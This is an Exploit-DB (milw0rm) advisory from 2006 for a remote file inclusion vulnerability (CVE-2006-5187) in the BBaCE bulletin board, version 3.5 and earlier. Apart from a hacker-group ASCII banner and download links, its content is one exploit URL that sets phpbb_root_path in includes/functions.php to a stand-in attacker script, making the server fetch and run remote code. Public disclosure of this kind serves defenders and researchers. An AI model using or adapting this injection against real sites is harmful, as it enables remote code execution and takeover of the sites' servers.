BBaCE <= 3.5 includes/functions.php Remote File Include Vulnerability

2006-10-02T00:00:00
ID EDB-ID:2468
Type exploitdb
Reporter SpiderZ
Modified 2006-10-02T00:00:00

Description

BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability. CVE-2006-5187. Webapps exploit for php platform

                                        
                                            _________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  &gt;&lt;  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# BBaCE Remote File Inclusion Vulnerability
# For: BBaCE v3 ( Bulletin Board Ace )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
-------------------------------------------------------------------------
Download: http://bbace.blogspot.com/2005/09/downloads.html
Download 2: http://www.phpbbhacks.com/download/3062
-------------------------------------------------------------------------
_________________________________________________________________________




http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]

# milw0rm.com [2006-10-02]